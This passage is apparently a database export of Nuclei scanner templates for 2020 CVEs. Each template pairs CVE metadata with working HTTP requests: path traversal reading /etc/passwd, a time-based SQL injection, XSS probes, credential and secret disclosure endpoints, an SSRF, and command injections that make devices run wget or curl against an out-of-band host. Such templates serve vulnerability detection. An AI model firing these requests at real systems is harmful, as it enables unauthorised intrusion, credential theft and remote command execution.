cvss-score: 7.5\n cve-id: CVE-2020-26876\n cwe-id: CWE-306\n epss-score: 0.01988\n epss-percentile: 0.8756\n cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpcoursesplugin\n product: wp-courses\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,exposure,edb,wpcoursesplugin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/wp/v2/lesson/1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"rest_post_invalid_id\"\n - \"\\\"(guid|title|content|excerpt)\\\":{\\\"rendered\\\":\"\n condition: or\n\n - type: status\n status:\n - 200\n - 404\n condition: or\n# digest: 4a0a00473045022100bac7ab1c102483005544a8092e8ebf09e74b5e8e497a2619f0aa05b7e4d877640220469c403326592d174fb4d0dc48c2bbba4aba553242fd2ba06bbcf788c29951f6:922c64590222798bb761d5b6d8e72950", "hash": "b1dfa0a8d71de5eb1e8ffdd834614ec3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ec" }, "name": "CVE-2020-26919.yaml", "content": "id: CVE-2020-26919\n\ninfo:\n name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution\n author: gy741\n severity: critical\n description: NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n reference:\n - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/\n - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26919\n - https://kb.netgear.com/000062334/Security-Advisory-for-Missing-Function-Level-Access-Control-on-JGS516PE-PSV-2020-0377\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-26919\n epss-score: 0.97285\n epss-percentile: 0.99849\n cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: jgs516pe_firmware\n tags: cve,cve2020,netgear,rce,oast,router,unauth,kev\n\nhttp:\n - raw:\n - |\n POST /login.htm HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4b0a00483046022100d2e91cf5797e148b54ee16ff4a7527477ceef3ac4051306dd1a029f075032ff70221009edba962cee52737ac2d8f232b2701ea2f789aefa1b7c4a87beb542aeec67bb3:922c64590222798bb761d5b6d8e72950", "hash": "fe79daefb3fbf6a55c69f272267828fb", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ed" }, "name": "CVE-2020-26948.yaml", "content": "id: CVE-2020-26948\n\ninfo:\n name: Emby Server Server-Side Request Forgery\n author: dwisiswant0\n severity: critical\n description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.\n impact: |\n An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Emby Server.\n reference:\n - https://github.com/btnz-k/emby_ssrf\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26948\n - https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Live-Hack-CVE/CVE-2020-26948\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-26948\n cwe-id: CWE-918\n epss-score: 0.1449\n epss-percentile: 0.95606\n cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: emby\n product: emby\n tags: cve2020,cve,emby,jellyfin,ssrf\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Name or service not known\"\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100c5b4229b7c0844e8fcfb9bc1679051e3ac701c065fd3e5789469152a7df1ec21022100980de112b617f6c799be1d61a0dd773d11dfc361c3d2bd02d98dae82ac6e8d47:922c64590222798bb761d5b6d8e72950", "hash": "2b96d428602111a14fae217001419d53", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ee" }, "name": "CVE-2020-27191.yaml", "content": "id: CVE-2020-27191\n\ninfo:\n name: LionWiki <3.2.12 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.\n remediation: |\n Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability.\n reference:\n - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi\n - http://lionwiki.0o.cz/index.php?page=Main+page\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27191\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-27191\n cwe-id: CWE-22\n epss-score: 0.01572\n epss-percentile: 0.86986\n cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lionwiki\n product: lionwiki\n tags: cve2020,cve,lionwiki,lfi,oss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\\\.//./\\\\.//./\\\\.//./\\\\.//./\\\\.//./etc/passwd&restore=1\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 480a00453043022024fd9eabd5990697a1c0d513e268964dba7e4032104e676f2c1516f0d7bf1e6c021f01979b841bd595af2324f5a4beea443729213ab4e816a2f27b4f681dfe71ac:922c64590222798bb761d5b6d8e72950", "hash": "674473cba764c4dab79467cb7ae799e5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ef" }, "name": "CVE-2020-2733.yaml", "content": "id: CVE-2020-2733\n\ninfo:\n name: JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure\n author: DhiyaneshDk,pussycat0x\n severity: critical\n description: |\n JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://redrays.io/cve-2020-2733-jd-edwards/\n - https://www.oracle.com/security-alerts/cpuapr2020.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2733\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-2733\n epss-score: 0.29301\n epss-percentile: 0.96779\n cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: oracle\n product: jd_edwards_enterpriseone_tools\n shodan-query: port:8999 product:\"Oracle WebLogic Server\"\n tags: cve2020,cve,oracle,weblogic,disclosure,exposure\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/manage/fileDownloader?sec=1'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'ACHCJK'\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202fa8f3f605bced9c2bff8bd71dfd1b657c7806b31db0da37ba79f848736c0448022100b028c9c54f50d73729aa0630e94a3a90f88663ee769dae3762ef6b64d4da2dd0:922c64590222798bb761d5b6d8e72950", "hash": "7c7e9b09252c12448251458633c15049", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f0" }, "name": "CVE-2020-27361.yaml", "content": "id: CVE-2020-27361\n\ninfo:\n name: Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure\n author: gy741\n severity: high\n description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Apply the latest patch or upgrade to a newer version of Akkadian Provisioning Manager to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27191\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-27361\n cwe-id: CWE-668\n epss-score: 0.0314\n epss-percentile: 0.90098\n cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: akkadianlabs\n product: akkadian_provisioning_manager\n tags: cve,cve2020,akkadian,listing,exposure,akkadianlabs\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pme/media/\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Index of /pme/media\"\n - \"Parent Directory\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210094fff2188339af554a474a738ff3f251d4a53c536e71f4721382505f0d6ba8db0220423fcb2526fa835902d21390aba7a4b75a61a03cf26b7e9af708346a2dddbeea:922c64590222798bb761d5b6d8e72950", "hash": "781c58bc4467b44a210390a6bf7e00f6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f1" }, "name": "CVE-2020-27467.yaml", "content": "id: CVE-2020-27467\n\ninfo:\n name: Processwire CMS <2.7.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.\n remediation: |\n Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability.\n reference:\n - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire\n - https://processwire.com/\n - https://github.com/ceng-yildirim/LFI-processwire\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27467\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-27467\n cwe-id: CWE-22\n epss-score: 0.01056\n epss-percentile: 0.83739\n cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: processwire\n product: processwire\n tags: cve,cve2020,processwire,lfi,cms,oss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?download=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022005cc8cc6d259f90bddcc4ab74577e25407c52171a5893d763b5d5ab1dd6159c602204a99b859d07b48c2f47cf2a1a8329315e236c3999217ea353e49076587c74df0:922c64590222798bb761d5b6d8e72950", "hash": "defcd42c9729dc39e95b77e355e05035", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f2" }, "name": "CVE-2020-27481.yaml", "content": "id: CVE-2020-27481\n\ninfo:\n name: Good Layers LMS Plugin <= 2.1.4 - SQL Injection\n author: edoardottt\n severity: critical\n description: |\n An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of \"wp_ajax_nopriv\" call in WordPress, which allows any unauthenticated user to get access to the function \"gdlr_lms_cancel_booking\" where POST Parameter \"id\" was sent straight into SQL query without sanitization.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/652eaef8-5a3c-4a2d-ac60-b5414565c397\n - https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27481\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-27481\n cwe-id: CWE-89\n epss-score: 0.12857\n epss-percentile: 0.94961\n cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: goodlayers\n product: good_learning_management_system\n framework: wordpress\n tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n\n matchers:\n - type: dsl\n dsl:\n - \"duration>=6\"\n - \"status_code == 200\"\n - \"contains(body, 'goodlayers-lms') || contains(body, 'goodlms')\"\n condition: and\n# digest: 4a0a00473045022100838e205274d6592ebebcc4ab9b689fd6d05ec245b61cb0f69cff831152ea32dd02203fc10829d7d36c26e62df66914a28f76aea1fb34c5f7162abe66805dbf74f212:922c64590222798bb761d5b6d8e72950", "hash": "2419f77e0c7e0bbb59ac18b62eaea5f4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f3" }, "name": "CVE-2020-27735.yaml", "content": "id: CVE-2020-27735\n\ninfo:\n name: Wing FTP 6.4.4 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability.\n reference:\n - https://www.wftpserver.com/serverhistory.htm\n - https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27735\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-27735\n cwe-id: CWE-79\n epss-score: 0.00228\n epss-percentile: 0.60318\n cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wftpserver\n product: wing_ftp_server\n tags: cve,cve2020,xss,wing-ftp,wftpserver\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a494d928ecfd0bcd8f5ad8d80b1ea8390fed72aca1ab771e8e49b09004d6c4fc022100f5d799e1f6995828b9abf133313b998de24a8ae77af0cf98077f0656f7d36bef:922c64590222798bb761d5b6d8e72950", "hash": "f43968ae6d86ef41d86c08e3728d28c1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f4" }, "name": "CVE-2020-27838.yaml", "content": "id: CVE-2020-27838\n\ninfo:\n name: KeyCloak - Information Exposure\n author: mchklt\n severity: medium\n description: |\n A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.\n impact: |\n The vulnerability allows an attacker to gain sensitive information from the KeyCloak server.\n remediation: |\n Apply the latest security patches or updates provided by the KeyCloak vendor.\n reference:\n - https://bugzilla.redhat.com/show_bug.cgi?id=1906797\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27838\n - https://github.com/muneebaashiq/MBProjects\n - https://github.com/j4k0m/godkiller\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-27838\n cwe-id: CWE-287\n epss-score: 0.08135\n epss-percentile: 0.93734\n cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: redhat\n product: keycloak\n shodan-query: \"title:\\\"keycloak\\\"\"\n tags: cve,cve2020,keycloak,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"clientId\":\"security-admin-console\"'\n - '\"secret\":'\n condition: and\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e340099dadc3710a63b8cc3e0182b0c1a738f7480c069fa5c39913092f31b39802201ad2dbae637d451dd3a442b8c8a7d2f0d5244240545b98ba4431a62241c66fa6:922c64590222798bb761d5b6d8e72950", "hash": "a426135003b0719cd778bda922f41fb1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f5" }, "name": "CVE-2020-27866.yaml", "content": "id: CVE-2020-27866\n\ninfo:\n name: NETGEAR - Authentication Bypass\n author: gy741\n severity: high\n description: NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify network configurations, intercept traffic, or launch further attacks.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to fix the authentication bypass vulnerability.\n reference:\n - https://wzt.ac.cn/2021/01/13/AC2400_vuln/\n - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866\n - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27866\n classification:\n cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-27866\n cwe-id: CWE-288,CWE-287\n epss-score: 0.00363\n epss-percentile: 0.69495\n cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: ac2100_firmware\n tags: cve,cve2020,netgear,auth-bypass\n\nhttp:\n - raw:\n - |\n GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: */*\n Accept-Language: en\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Debug Enable!'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206614a114a0e46ccd3935e0a85a4ce47db02ad69127536ba5caaf39e4b766fd7b022100e8ec849c63835f81173d35f82f959e45539cb809a531d887b39b8e4880829958:922c64590222798bb761d5b6d8e72950", "hash": "7d950a8eac92e8e50cb379e96ea56075", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f6" }, "name": "CVE-2020-27982.yaml", "content": "id: CVE-2020-27982\n\ninfo:\n name: IceWarp WebMail 11.4.5.0 - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail.\n reference:\n - https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html\n - https://cxsecurity.com/issue/WLB-2020100161\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27982\n - http://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-27982\n cwe-id: CWE-79\n epss-score: 0.00178\n epss-percentile: 0.55072\n cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: icewarp\n product: mail_server\n shodan-query: title:\"icewarp\"\n tags: cve,cve2020,xss,icewarp,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022021228856359476fd6a2d98aa76d72aecb684490df2490020087fe9acc00d15bc022100d44cd28e5f19364d83758d6ab7063cd8cc4b7512064a93b92f336fbfc44e35af:922c64590222798bb761d5b6d8e72950", "hash": "e5a69dc79c6d874c24020683977a1128", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f7" }, "name": "CVE-2020-27986.yaml", "content": "id: CVE-2020-27986\n\ninfo:\n name: SonarQube - Authentication Bypass\n author: pikpikcu\n severity: high\n description: |\n SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,\n SVN, and GitLab credentials via the api/settings/values URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information.\n remediation: Reportedly, the vendor's position for SMTP and SVN is \"it is the administrator's responsibility to configure it.\"\n reference:\n - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27866\n - https://github.com/SexyBeast233/SecBooks\n - https://github.com/SouthWind0/southwind0.github.io\n - https://github.com/Z0fhack/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-27986\n cwe-id: CWE-306\n epss-score: 0.25376\n epss-percentile: 0.96582\n cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sonarsource\n product: sonarqube\n tags: cve,cve2020,sonarqube,sonarsource\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/settings/values\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - email.smtp_host.secured\n - email.smtp_password.secured\n - email.smtp_port.secured\n - email.smtp_username.secured\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022018dd73d96bac6da6fc47257dd5f2f32f35765baeeb0e50c617927f961d1ed43f02204921a13c37cf71890f34425dae58ae03f36c8aec68a45141cbd931b4edc23cec:922c64590222798bb761d5b6d8e72950", "hash": "9e10682274ff44f7fc972843b04b4a03", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f8" }, "name": "CVE-2020-28185.yaml", "content": "id: CVE-2020-28185\n\ninfo:\n name: TerraMaster TOS < 4.2.06 - User Enumeration\n author: pussycat0x\n severity: medium\n description: |\n User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.\n impact: |\n An attacker can enumerate valid usernames, potentially aiding in further attacks.\n remediation: |\n Upgrade TerraMaster TOS to version 4.2.06 or later.\n reference:\n - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28185\n - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n - https://www.terra-master.com/\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-28185\n epss-score: 0.00465\n epss-percentile: 0.74945\n cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: terra-master\n product: tos\n fofa-query: '\"TerraMaster\" && header=\"TOS\"'\n tags: cve2020,cve,terramaster,enum,tos,terra-master\n\nhttp:\n - raw:\n - |\n GET /tos/index.php?user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wizard/initialise.php HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n Referer: {{RootURL}}/tos/index.php?user/login\n\n tab=checkuser&username=admin\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"username\":'\n - '\"email\":'\n - '\"status\":'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n part: body_2\n regex:\n - '\"username\":\"(.*?)\"'\n - '\"email\":\"(.*?)\"'\n# digest: 4b0a0048304602210083f16f101ac090f5d7e921131e73a027f6009fff40f89865c434db95593638b7022100a606966b55e981d57fde6523d60dc96e82d5cdc44a754742dac2b5268a081294:922c64590222798bb761d5b6d8e72950", "hash": "c62ec274f6f04666db4b26c323e5cc80", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f9" }, "name": "CVE-2020-28188.yaml", "content": "id: CVE-2020-28188\n\ninfo:\n name: TerraMaster TOS - Unauthenticated Remote Command Execution\n author: gy741\n severity: critical\n description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Apply the latest security patch or update provided by TerraMaster to fix the vulnerability.\n reference:\n - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html\n - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28188\n - http://packetstormsecurity.com/files/172880/TerraMaster-TOS-4.2.06-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-28188\n cwe-id: CWE-78\n epss-score: 0.97279\n epss-percentile: 0.99845\n cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: terra-master\n product: tos\n tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\n Host: {{Hostname}}\n\n stop-at-first-match: 